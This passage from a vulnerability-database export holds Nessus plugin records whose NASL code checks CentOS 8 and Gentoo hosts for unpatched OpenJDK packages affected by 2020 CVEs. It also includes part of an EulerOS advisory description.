condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4347\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-src\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 
'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, 'java-1.8.0-openjdk / java-1.8.0-openjdk-accessibility / etc');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-04T09:23:11", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4305 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-02-01T00:00:00", "title": "CentOS 8 : java-11-openjdk (CESA-2020:4305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-01T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-11-openjdk-headless", "p-cpe:/a:centos:centos:java-11-openjdk-devel", "p-cpe:/a:centos:centos:java-11-openjdk", "p-cpe:/a:centos:centos:java-11-openjdk-demo", "p-cpe:/a:centos:centos:java-11-openjdk-jmods", "p-cpe:/a:centos:centos:java-11-openjdk-src", "cpe:/o:centos:centos:8", 
"p-cpe:/a:centos:centos:java-11-openjdk-javadoc-zip", "p-cpe:/a:centos:centos:java-11-openjdk-javadoc", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2020-4305.NASL", "href": "https://www.tenable.com/plugins/nessus/145835", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:4305. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145835);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/03\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"RHSA\", value:\"2020:4305\");\n\n script_name(english:\"CentOS 8 : java-11-openjdk (CESA-2020:4305)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4305 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 
8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4305\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:centos:centos:java-11-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-jmods\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-src\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? 
release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'java-11-openjdk-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-demo-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-demo-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-devel-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-devel-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-headless-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-headless-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-zip-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n 
{'reference':'java-11-openjdk-javadoc-zip-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-jmods-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-jmods-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-src-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-src-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'java-11-openjdk / java-11-openjdk-demo / 
java-11-openjdk-devel / etc');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-29T03:05:19", "description": "The remote host is affected by the vulnerability described in GLSA-202101-19\n(OpenJDK: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenJDK. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 2, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-25T00:00:00", "title": "GLSA-202101-19 : OpenJDK: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-2590", "CVE-2020-14781", "CVE-2020-2604", "CVE-2020-2583", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-2601", "CVE-2020-14797", "CVE-2020-2659", "CVE-2020-2593", "CVE-2020-14796", "CVE-2020-2654"], "modified": "2021-01-25T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:openjdk-bin", "p-cpe:/a:gentoo:linux:openjdk-jre-bin", "p-cpe:/a:gentoo:linux:openjdk"], "id": "GENTOO_GLSA-202101-19.NASL", "href": "https://www.tenable.com/plugins/nessus/145321", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202101-19.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145321);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-14779\", \"CVE-2020-14781\", \"CVE-2020-14782\", \"CVE-2020-14792\", \"CVE-2020-14796\", \"CVE-2020-14797\", \"CVE-2020-14798\", \"CVE-2020-14803\", \"CVE-2020-2583\", \"CVE-2020-2590\", \"CVE-2020-2593\", \"CVE-2020-2601\", \"CVE-2020-2604\", \"CVE-2020-2654\", \"CVE-2020-2659\");\n script_xref(name:\"GLSA\", value:\"202101-19\");\n\n script_name(english:\"GLSA-202101-19 : OpenJDK: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202101-19\n(OpenJDK: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenJDK. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202101-19\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All OpenJDK users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-java/openjdk-8.272_p10'\n All OpenJDK (binary) users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-java/openjdk-bin-8.272_p10'\n All OpenJDK JRE (binary) users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=dev-java/openjdk-jre-bin-8.272_p10'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openjdk-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openjdk-jre-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-java/openjdk\", unaffected:make_list(\"ge 8.272_p10\"), vulnerable:make_list(\"lt 8.272_p10\"))) flag++;\nif (qpkg_check(package:\"dev-java/openjdk-bin\", unaffected:make_list(\"ge 8.272_p10\"), vulnerable:make_list(\"lt 8.272_p10\"))) flag++;\nif (qpkg_check(package:\"dev-java/openjdk-jre-bin\", unaffected:make_list(\"ge 8.272_p10\"), vulnerable:make_list(\"lt 8.272_p10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenJDK\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-23T09:06:56", "description": "According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. 
Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. 
Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded 